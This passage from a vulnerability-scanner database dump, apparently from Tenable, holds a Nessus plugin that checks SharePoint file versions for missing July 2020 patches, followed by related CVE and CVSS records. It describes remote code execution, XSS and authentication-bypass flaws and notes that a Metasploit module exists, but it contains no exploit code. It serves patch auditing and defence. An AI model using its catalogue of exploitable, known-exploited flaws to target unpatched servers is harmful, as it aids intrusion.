"CVE-2020-1450", "CVE-2020-1451", "CVE-2020-1454", "CVE-2020-1456"], "modified": "2023-01-24T00:00:00", "cpe": ["cpe:/a:microsoft:sharepoint_foundation", "cpe:/a:microsoft:sharepoint_server"], "id": "SMB_NT_MS20_JUL_OFFICE_SHAREPOINT.NASL", "href": "https://www.tenable.com/plugins/nessus/138512", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from the Microsoft Security Updates API. The text\n# itself is copyright (C) Microsoft Corporation.\n#\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(138512);\n script_version(\"1.13\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2023/01/24\");\n\n script_cve_id(\n \"CVE-2020-1025\",\n \"CVE-2020-1147\",\n \"CVE-2020-1342\",\n \"CVE-2020-1439\",\n \"CVE-2020-1443\",\n \"CVE-2020-1444\",\n \"CVE-2020-1445\",\n \"CVE-2020-1446\",\n \"CVE-2020-1447\",\n \"CVE-2020-1448\",\n \"CVE-2020-1450\",\n \"CVE-2020-1451\",\n \"CVE-2020-1454\",\n \"CVE-2020-1456\"\n );\n script_xref(name:\"MSKB\", value:\"4484443\");\n script_xref(name:\"MSKB\", value:\"4484451\");\n script_xref(name:\"MSKB\", value:\"4484411\");\n script_xref(name:\"MSKB\", value:\"4484374\");\n script_xref(name:\"MSKB\", value:\"4484436\");\n script_xref(name:\"MSKB\", value:\"4484452\");\n script_xref(name:\"MSKB\", value:\"4484453\");\n script_xref(name:\"MSKB\", value:\"4484440\");\n script_xref(name:\"MSKB\", value:\"4484348\");\n script_xref(name:\"MSKB\", value:\"4484370\");\n script_xref(name:\"MSKB\", value:\"4484448\");\n script_xref(name:\"MSKB\", value:\"4484353\");\n script_xref(name:\"MSKB\", value:\"4484460\");\n script_xref(name:\"MSFT\", value:\"MS20-4484443\");\n script_xref(name:\"MSFT\", value:\"MS20-4484451\");\n script_xref(name:\"MSFT\", value:\"MS20-4484411\");\n script_xref(name:\"MSFT\", value:\"MS20-4484374\");\n script_xref(name:\"MSFT\", value:\"MS20-4484436\");\n script_xref(name:\"MSFT\", value:\"MS20-4484452\");\n script_xref(name:\"MSFT\", value:\"MS20-4484453\");\n script_xref(name:\"MSFT\", value:\"MS20-4484440\");\n script_xref(name:\"MSFT\", value:\"MS20-4484348\");\n script_xref(name:\"MSFT\", value:\"MS20-4484370\");\n script_xref(name:\"MSFT\", value:\"MS20-4484448\");\n script_xref(name:\"MSFT\", value:\"MS20-4484353\");\n script_xref(name:\"MSFT\", value:\"MS20-4484460\");\n script_xref(name:\"IAVA\", value:\"2020-A-0311-S\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/05/03\");\n\n script_name(english:\"Security Updates for Microsoft SharePoint Server (July 2020)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The Microsoft SharePoint Server installation on the remote host is affected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The Microsoft SharePoint Server installation on the remote\nhost is missing security updates. It is, therefore, affected\nby multiple vulnerabilities :\n\n - An elevation of privilege vulnerability exists when\n Microsoft SharePoint Server and Skype for Business\n Server improperly handle OAuth token validation. An\n attacker who successfully exploited the vulnerability\n could bypass authentication and achieve improper access.\n (CVE-2020-1025)\n\n - An information disclosure vulnerability exists when\n Microsoft Office improperly discloses the contents of\n its memory. An attacker who exploited the vulnerability\n could use the information to compromise the users\n computer or data. (CVE-2020-1445)\n\n - An information disclosure vulnerability exists when\n Microsoft Office software reads out of bound memory due\n to an uninitialized variable, which could disclose the\n contents of memory. An attacker who successfully\n exploited the vulnerability could view out of bound\n memory. Exploitation of the vulnerability requires that\n a user open a specially crafted file with an affected\n version of Microsoft Office software. The security\n update addresses the vulnerability by properly\n initializing the affected variable. (CVE-2020-1342)\n\n - A remote code execution vulnerability exists in\n PerformancePoint Services for SharePoint Server when the\n software fails to check the source markup of XML file\n input. An attacker who successfully exploited the\n vulnerability could run arbitrary code in the context of\n the process responsible for deserialization of the XML\n content. (CVE-2020-1439)\n\n - A cross-site-scripting (XSS) vulnerability exists when\n Microsoft SharePoint Server does not properly sanitize a\n specially crafted web request to an affected SharePoint\n server. An authenticated attacker could exploit the\n vulnerability by sending a specially crafted request to\n an affected SharePoint server. The attacker who\n successfully exploited the vulnerability could then\n perform cross-site scripting attacks on affected systems\n and run script in the security context of the current\n user. The attacks could allow the attacker to read\n content that the attacker is not authorized to read, use\n the victim's identity to take actions on the SharePoint\n site on behalf of the user, such as change permissions\n and delete content, and inject malicious content in the\n browser of the user. The security update addresses the\n vulnerability by helping to ensure that SharePoint\n Server properly sanitizes web requests. (CVE-2020-1450,\n CVE-2020-1451, CVE-2020-1456)\n\n - A spoofing vulnerability exists when Microsoft\n SharePoint Server does not properly sanitize a specially\n crafted web request to an affected SharePoint server. An\n authenticated attacker could exploit the vulnerability\n by sending a specially crafted request to an affected\n SharePoint server. The attacker who successfully\n exploited the vulnerability could then perform cross-\n site scripting attacks on affected systems and run\n script in the security context of the current user.\n These attacks could allow the attacker to read content\n that the attacker is not authorized to read, use the\n victim's identity to take actions on the SharePoint site\n on behalf of the user, such as change permissions and\n delete content, and inject malicious content in the\n browser of the user. The security update addresses the\n vulnerability by helping to ensure that SharePoint\n Server properly sanitizes web requests. (CVE-2020-1443)\n\n - A remote code execution vulnerability exists in the way\n Microsoft SharePoint software parses specially crafted\n email messages. An attacker who successfully exploited\n the vulnerability could run arbitrary code in the\n context of the system user. An attacker could then\n install programs; view, change, add, or delete data.\n (CVE-2020-1444)\n\n - This vulnerability is caused when SharePoint Server does\n not properly sanitize a specially crafted request to an\n affected SharePoint server. An authenticated attacker\n could exploit this vulnerability by sending a specially\n crafted request to an affected SharePoint server. The\n attacker who successfully exploited this vulnerability\n could then perform cross-site scripting attacks on\n affected systems and run script in the security context\n of the current user. These attacks could allow the\n attacker to read content that the attacker is not\n authorized to read, use the victim's identity to take\n actions on the SharePoint site on behalf of the victim,\n such as change permissions, delete content, steal\n sensitive information (such as browser cookies) and\n inject malicious content in the browser of the victim.\n For this vulnerability to be exploited, a user must\n click a specially crafted URL that takes the user to a\n targeted SharePoint Web App site. In an email attack\n scenario, an attacker could exploit the vulnerability by\n sending an email message containing the specially\n crafted URL to the user of the targeted SharePoint Web\n App site and convincing the user to click the specially\n crafted URL. (CVE-2020-1454)\n\n - A remote code execution vulnerability exists in\n Microsoft Word software when it fails to properly handle\n objects in memory. An attacker who successfully\n exploited the vulnerability could use a specially\n crafted file to perform actions in the security context\n of the current user. For example, the file could then\n take actions on behalf of the logged-on user with the\n same permissions as the current user. (CVE-2020-1446,\n CVE-2020-1447, CVE-2020-1448)\n\n - A remote code execution vulnerability exists in .NET\n Framework, Microsoft SharePoint, and Visual Studio when\n the software fails to check the source markup of XML\n file input. An attacker who successfully exploited the\n vulnerability could run arbitrary code in the context of\n the process responsible for deserialization of the XML\n content. (CVE-2020-1147)\");\n # https://support.microsoft.com/en-us/help/4484443/security-update-for-sharepoint-server-2013-july-14-2020\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?c1100364\");\n # https://support.microsoft.com/en-us/help/4484451/security-update-for-office-online-server-july-14-2020\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?cce850ff\");\n # https://support.microsoft.com/en-us/help/4484411/security-update-for-sharepoint-foundation-2013-july-14-2020\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?18413cb3\");\n # https://support.microsoft.com/en-us/help/4484374/security-update-for-sharepoint-server-2010-july-14-2020\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?4cc0694a\");\n # https://support.microsoft.com/en-us/help/4484436/security-update-for-sharepoint-server-2016-july-14-2020\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?3072fa83\");\n # https://support.microsoft.com/en-us/help/4484452/security-update-for-sharepoint-server-2019-language-pack-july-14-2020\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?a1863e77\");\n # https://support.microsoft.com/en-us/help/4484453/security-update-for-sharepoint-server-2019-july-14-2020\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?4a7e0254\");\n # https://support.microsoft.com/en-us/help/4484440/security-update-for-sharepoint-server-2016-july-14-2020\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?4c979319\");\n # https://support.microsoft.com/en-us/help/4484348/security-update-for-sharepoint-server-2013-july-14-2020\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?04aa536f\");\n # https://support.microsoft.com/en-us/help/4484370/security-update-for-sharepoint-server-2010-july-14-2020\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?270b620b\");\n # https://support.microsoft.com/en-us/help/4484448/security-update-for-sharepoint-foundation-2013-july-14-2020\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?0e00ca47\");\n # https://support.microsoft.com/en-us/help/4484353/security-update-for-sharepoint-server-2013-july-14-2020\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?1ae8e571\");\n # https://support.microsoft.com/en-us/help/4484460/security-update-for-sharepoint-server-2010-july-14\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?331c84f8\");\n script_set_attribute(attribute:\"solution\", value:\n\"Microsoft has released security updates for Microsoft SharePoint Server.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2020-1025\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'SharePoint DataSet / DataTable Deserialization');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2020/07/14\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2020/07/14\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2020/07/15\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:microsoft:sharepoint_foundation\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:microsoft:sharepoint_server\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows : Microsoft Bulletins\");\n\n script_copyright(english:\"This script is Copyright (C) 2020-2023 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"microsoft_sharepoint_installed.nbin\", \"smb_hotfixes.nasl\", \"ms_bulletin_checks_possible.nasl\");\n script_require_keys(\"SMB/MS_Bulletin_Checks/Possible\");\n script_require_ports(139, 445, \"Host/patch_management_checks\");\n\n exit(0);\n}\n\ninclude('smb_func.inc');\ninclude('smb_hotfixes.inc');\ninclude('smb_hotfixes_fcheck.inc');\ninclude('smb_reg_query.inc');\ninclude('misc_func.inc');\ninclude('install_func.inc');\ninclude('lists.inc');\n\nget_kb_item_or_exit('SMB/MS_Bulletin_Checks/Possible');\n\nbulletin = 'MS20-07';\n\nkbs = make_list(\n '4484374', # 2010 Server \n '4484460', # 2010 Server\n '4484370', # 2010 Server\n '4484448', # 2013 Foundation\n '4484411', # 2013 Foundation\n '4484443', # 2013 Enterprise\n '4484353', # 2013 Enterprise\n '4484348', # 2013 Enterprise\n '4484436', # 2016 Enterprise\n '4484440', # 2016 Enterprise\n '4484452', # 2019 Language pack\n '4484453' # 2019 Server\n);\n\nif (get_kb_item('Host/patch_management_checks'))\n hotfix_check_3rd_party(bulletin:bulletin, kbs:kbs, severity:SECURITY_HOLE);\n\nget_kb_item_or_exit('SMB/Registry/Enumerated', exit_code:1);\n\n# Get path information for Windows.\nwindir = hotfix_get_systemroot();\nif (isnull(windir)) exit(1, 'Failed to determine the location of %windir%.');\n\nregistry_init();\n\ninstall = get_single_install(app_name:'Microsoft SharePoint Server');\n\nkb_checks =\n{\n '2010':\n { '2': \n {'Server':\n [{\n 'kb' : '4484374',\n 'path' : hotfix_get_commonfilesdir(),\n 'append' : 'microsoft shared\\\\web server extensions\\\\14\\\\template\\\\layouts\\\\ppsma\\\\1033\\\\designerinstall',\n 'file' : 'Microsoft.PerformancePoint.Scorecards.Client.dll.deploy',\n 'version' : '14.0.7254.5000',\n 'product_name' : 'Microsoft SharePoint Server 2010 SP 2'\n },\n {\n 'kb' : '4484460',\n 'path' : install['path'],\n 'append' : 'bin',\n 'file' : 'microsoft.office.server.chart.dll',\n 'version' : '14.0.7254.5000',\n 'product_name' : 'Microsoft SharePoint Server 2010 SP 2'\n },\n {\n 'kb' : '4484370',\n 'path' : install['path'],\n 'append' : 'webservices\\\\wordserver\\\\core',\n 'file' : 'sword.dll',\n 'version' : '14.0.7254.5000',\n 'product_name' : 'Microsoft SharePoint Server 2010 SP 2'\n }]\n }\n },\n '2013':\n { '1':\n {'Foundation':\n [{\n 'kb' : '4484448',\n 'path' : hotfix_get_commonfilesdir(),\n 'append' : 'microsoft shared\\\\web server extensions\\\\15\\\\bin',\n 'file' : 'onetutil.dll',\n 'version' : '15.0.5259.1000',\n 'product_name' : 'Microsoft SharePoint Foundation Server 2013 SP1'\n },\n {\n 'kb' : '4484411',\n 'path' : hotfix_get_commonfilesdir(),\n 'append' : 'microsoft shared\\\\server15\\\\server setup controller',\n 'file' : 'wsssetup.dll',\n 'version' : '15.0.5259.1000',\n 'product_name' : 'Microsoft SharePoint Foundation Server 2013 SP1'\n }],\n 'Server':\n [{ \n 'kb' : '4484443',\n 'path' : install['path'],\n 'append' : 'webservices\\\\conversionservices',\n 'file' : 'msoserver.dll',\n 'version' : '15.0.5249.1000',\n 'product_name' : 'Microsoft SharePoint Enterprise Server 2013 SP1'\n },\n { \n 'kb' : '4484353',\n 'path' : install['path'],\n 'append' : 'webservices\\\\conversionservices',\n 'file' : 'htmlutil.dll',\n 'version' : '15.0.5249.1000',\n 'product_name' : 'Microsoft SharePoint Enterprise Server 2013 SP1'\n },\n { \n 'kb' : '4484348',\n 'path' : install['path'],\n 'append' : 'webservices\\\\conversionservices',\n 'file' : 'sword.dll',\n 'version' : '15.0.5259.1000',\n 'product_name' : 'Microsoft SharePoint Enterprise Server 2013 SP1'\n }\n ]\n }\n },\n '2016':\n { '0':\n {'Server':\n [{ \n 'kb' : '4484436',\n 'path' : install['path'],\n 'append' : 'transformapps',\n 'file' : 'docxpageconverter.exe',\n 'version' : '16.0.5023.1000',\n 'product_name' : 'Microsoft SharePoint Enterprise Server 2016'\n },\n { \n 'kb' : '4484440',\n 'path' : hotfix_get_commonfilesdir(),\n 'append' : 'microsoft shared\\\\server16\\\\server setup controller',\n 'file' : 'wsssetup.dll',\n 'version' : '16.0.5023.1000',\n 'product_name' : 'Microsoft SharePoint Enterprise Server 2016'\n }\n ]\n }\n },\n '2019':\n { '0':\n {'Server':\n [{\n 'kb' : '4484452',\n 'path' : install['path'],\n 'append' : 'bin\\\\1033',\n 'file' : 'notessetup.exe',\n 'version' : '16.0.10362.20025',\n 'product_name' : 'Microsoft SharePoint Server 2019'\n },\n {\n 'kb' : '4484453',\n 'path' : hotfix_get_commonfilesdir(),\n 'append' : 'microsoft shared\\\\web server extensions\\\\16\\\\bin',\n 'file' : 'csisrv.dll',\n 'version' : '16.0.10363.12107',\n 'product_name' : 'Microsoft SharePoint Server 2019'\n }]\n }\n }\n};\n\n# Get the specific product / path \nparam_list = kb_checks[install['Product']][install['SP']][install['Edition']];\n\n# audit if not affected\nif(isnull(param_list)) audit(AUDIT_INST_VER_NOT_VULN, 'Microsoft SharePoint Server');\n\nvuln = FALSE;\nxss = FALSE;\nport = kb_smb_transport();\nreg_keys = get_kb_list('SMB/Registry/HKLM/SOFTWARE/Microsoft/Windows/CurrentVersion/Uninstall/*/DisplayName');\n\n# grab the path otherwise\nforeach check (param_list)\n{\n\n if(check['kb'] == '4484452')\n {\n are_we_vuln = HCF_OLDER;\n foreach display_name (reg_keys)\n {\n if ('KB'+check['kb'] >< display_name)\n {\n are_we_vuln = HCF_OK;\n break;\n }\n }\n }\n \n if (!isnull(check['version']))\n {\n path = hotfix_append_path(path:check['path'], value:check['append']);\n\n are_we_vuln = hotfix_check_fversion(\n file:check['file'],\n version:check['version'],\n path:path,\n kb:check['kb'],\n product:check['product_name']\n );\n }\n else\n {\n report = '\\n';\n if (check['product_name'])\n report += ' Product : ' + check['product_name'] + '\\n';\n if (check['kb'])\n report += ' KB : ' + check['kb'] + '\\n';\n hotfix_add_report(report, kb:check['kb']);\n }\n\n if(are_we_vuln == HCF_OLDER)\n {\n vuln = TRUE;\n if (check['kb'] == '4484452' ||\n check['kb'] == '4484453' ||\n check['kb'] == '4484443' ||\n check['kb'] == '4484460' ||\n check['kb'] == '4484460' ||\n check['kb'] == '4484436' \n ) xss = TRUE;\n }\n}\n\nif (vuln)\n{\n port = kb_smb_transport();\n replace_kb_item(name:'SMB/Missing/'+bulletin, value:TRUE);\n if (xss) replace_kb_item(name:'www/' + port + '/XSS', value:TRUE);\n hotfix_security_hole();\n hotfix_check_fversion_end();\n exit(0);\n}\nelse\n{\n hotfix_check_fversion_end();\n audit(AUDIT_HOST_NOT, 'affected');\n}\n\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-03-23T15:09:12", "description": "According to its self-reported version number, the Microsoft SharePoint application running on the remote host is affected by multiple vulnerabilities :\n\n- A remote code execution vulnerability exists in PerformancePoint Services for SharePoint Server when the software fails to check the source markup of XML file input.\n\n- A spoofing vulnerability exists when Microsoft SharePoint Server does not properly sanitize a specially crafted web request to an affected SharePoint server.\n\n- A cross-site-scripting (XSS) vulnerability exists when Microsoft SharePoint Server does not properly sanitize a specially crafted web request to an affected SharePoint server.\n\n- An information disclosure vulnerability exists when Microsoft Office software reads out of bound memory due to an uninitialized variable, which could disclose the contents of memory.\n\n- An elevation of privilege vulnerability exists when Microsoft SharePoint Server and Skype for Business Server improperly handle OAuth token validation.\n\n- A remote code execution vulnerability exists in the way Microsoft SharePoint software parses specially crafted email messages.\n\n- An information disclosure vulnerability exists when Microsoft Office improperly discloses the contents of its memory.\n\n- This vulnerability is caused when SharePoint Server does not properly sanitize a specially crafted request to an affected SharePoint server.\n\nNote that the scanner has not tested for these issues but has instead relied only on the application's self-reported version number.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2020-09-09T00:00:00", "type": "nessus", "title": "Microsoft SharePoint Server 2019 < 16.0.10363.12107 Multiple Vulnerabilities", "bulletinFamily": "scanner", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-1025", "CVE-2020-1147", "CVE-2020-1342", "CVE-2020-1439", "CVE-2020-1443", "CVE-2020-1444", "CVE-2020-1445", "CVE-2020-1446", "CVE-2020-1447", "CVE-2020-1448", "CVE-2020-1450", "CVE-2020-1451", "CVE-2020-1454", "CVE-2020-1456"], "modified": "2023-03-14T00:00:00", "cpe": ["cpe:2.3:a:microsoft:sharepoint_server:*:*:*:*:*:*:*:*"], "id": "WEB_APPLICATION_SCANNING_112592", "href": "https://www.tenable.com/plugins/was/112592", "sourceData": "No source data", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-03-23T15:09:12", "description": "According to its self-reported version number, the Microsoft SharePoint application running on the remote host is affected by multiple vulnerabilities :\n\n- A remote code execution vulnerability exists in PerformancePoint Services for SharePoint Server when the software fails to check the source markup of XML file input.\n\n- A spoofing vulnerability exists when Microsoft SharePoint Server does not properly sanitize a specially crafted web request to an affected SharePoint server.\n\n- A cross-site-scripting (XSS) vulnerability exists when Microsoft SharePoint Server does not properly sanitize a specially crafted web request to an affected SharePoint server.\n\n- An information disclosure vulnerability exists when Microsoft Office software reads out of bound memory due to an uninitialized variable, which could disclose the contents of memory.\n\n- An elevation of privilege vulnerability exists when Microsoft SharePoint Server and Skype for Business Server improperly handle OAuth token validation.\n\n- A remote code execution vulnerability exists in the way Microsoft SharePoint software parses specially crafted email messages.\n\n- An information disclosure vulnerability exists when Microsoft Office improperly discloses the contents of its memory.\n\n- This vulnerability is caused when SharePoint Server does not properly sanitize a specially crafted request to an affected SharePoint server.\n\nNote that the scanner has not tested for these issues but has instead relied only on the application's self-reported version number.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2020-09-09T00:00:00", "type": "nessus", "title": "Microsoft SharePoint Server 2010 < 14.0.7255.5000 Multiple Vulnerabilities", "bulletinFamily": "scanner", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-1025", "CVE-2020-1147", "CVE-2020-1342", "CVE-2020-1439", "CVE-2020-1443", "CVE-2020-1444", "CVE-2020-1445", "CVE-2020-1446", "CVE-2020-1447", "CVE-2020-1448", "CVE-2020-1450", "CVE-2020-1451", "CVE-2020-1454", "CVE-2020-1456"], "modified": "2023-03-14T00:00:00", "cpe": ["cpe:2.3:a:microsoft:sharepoint_server:*:*:*:*:*:*:*:*"], "id": "WEB_APPLICATION_SCANNING_112593", "href": "https://www.tenable.com/plugins/was/112593", "sourceData": "No source data", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-03-23T15:09:12", "description": "According to its self-reported version number, the Microsoft SharePoint application running on the remote host is affected by multiple vulnerabilities :\n\n- A remote code execution vulnerability exists in PerformancePoint Services for SharePoint Server when the software fails to check the source markup of XML file input.\n\n- A spoofing vulnerability exists when Microsoft SharePoint Server does not properly sanitize a specially crafted web request to an affected SharePoint server.\n\n- A cross-site-scripting (XSS) vulnerability exists when Microsoft SharePoint Server does not properly sanitize a specially crafted web request to an affected SharePoint server.\n\n- An information disclosure vulnerability exists when Microsoft Office software reads out of bound memory due to an uninitialized variable, which could disclose the contents of memory.\n\n- An elevation of privilege vulnerability exists when Microsoft SharePoint Server and Skype for Business Server improperly handle OAuth token validation.\n\n- A remote code execution vulnerability exists in the way Microsoft SharePoint software parses specially crafted email messages.\n\n- An information disclosure vulnerability exists when Microsoft Office improperly discloses the contents of its memory.\n\n- This vulnerability is caused when SharePoint Server does not properly sanitize a specially crafted request to an affected SharePoint server.\n\nNote that the scanner has not tested for these issues but has instead relied only on the application's self-reported version number.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2020-09-09T00:00:00", "type": "nessus", "title": "Microsoft SharePoint Server 2016 < 16.0.5032.1002 Multiple Vulnerabilities", "bulletinFamily": "scanner", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-1025", "CVE-2020-1147", "CVE-2020-1342", "CVE-2020-1439", "CVE-2020-1443", "CVE-2020-1444", "CVE-2020-1445", "CVE-2020-1446", "CVE-2020-1447", "CVE-2020-1448", "CVE-2020-1450", "CVE-2020-1451", "CVE-2020-1454", "CVE-2020-1456"], "modified": "2023-03-14T00:00:00", "cpe": ["cpe:2.3:a:microsoft:sharepoint_server:*:*:*:*:*:*:*:*"], "id": "WEB_APPLICATION_SCANNING_112590", "href": "https://www.tenable.com/plugins/was/112590", "sourceData": "No source data", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-03-23T15:09:10", "description": "According to its self-reported version number, the Microsoft SharePoint application running on the remote host is affected by multiple vulnerabilities :\n\n- A remote code execution vulnerability exists in PerformancePoint Services for SharePoint Server when the software fails to check the source markup of XML file input.\n\n- A spoofing vulnerability exists when Microsoft SharePoint Server does not properly sanitize a specially crafted web request to an affected SharePoint server.\n\n- A cross-site-scripting (XSS) vulnerability exists when Microsoft SharePoint Server does not properly sanitize a specially crafted web request to an affected SharePoint server.\n\n- An information disclosure vulnerability exists when Microsoft Office software reads out of bound memory due to an uninitialized variable, which could disclose the contents of memory.\n\n- An elevation of privilege vulnerability exists when Microsoft SharePoint Server and Skype for Business Server improperly handle OAuth token validation.\n\n- A remote code execution vulnerability exists in the way Microsoft SharePoint software parses specially crafted email messages.\n\n- An information disclosure vulnerability exists when Microsoft Office improperly discloses the contents of its memory.\n\n- This vulnerability is caused when SharePoint Server does not properly sanitize a specially crafted request to an affected SharePoint server.\n\nNote that the scanner has not tested for these issues but has instead relied only on the application's self-reported version number.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2020-09-09T00:00:00", "type": "nessus", "title": "Microsoft SharePoint Server 2013 < 15.0.5259.1001 Multiple Vulnerabilities", "bulletinFamily": "scanner", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-1025", "CVE-2020-1147", "CVE-2020-1342", "CVE-2020-1439", "CVE-2020-1443", "CVE-2020-1444", "CVE-2020-1445", "CVE-2020-1446", "CVE-2020-1447", "CVE-2020-1448", "CVE-2020-1450", "CVE-2020-1451", "CVE-2020-1454", "CVE-2020-1456"], "modified": "2023-03-14T00:00:00", "cpe": ["cpe:2.3:a:microsoft:sharepoint_server:*:*:*:*:*:*:*:*"], "id": "WEB_APPLICATION_SCANNING_112591", "href": "https://www.tenable.com/plugins/was/112591", "sourceData": "No source data", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-01-11T15:16:53", "description": "The remote Windows host is missing security update 4565529 or cumulative update 4565536. It is, therefore, affected by multiple vulnerabilities :\n\n - A remote code execution vulnerability exists in the way that DirectWrite handles objects in memory. An attacker who successfully exploited this vulnerability could take control of the affected system. An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights. There are multiple ways an attacker could exploit the vulnerability, such as by convincing a user to open a specially 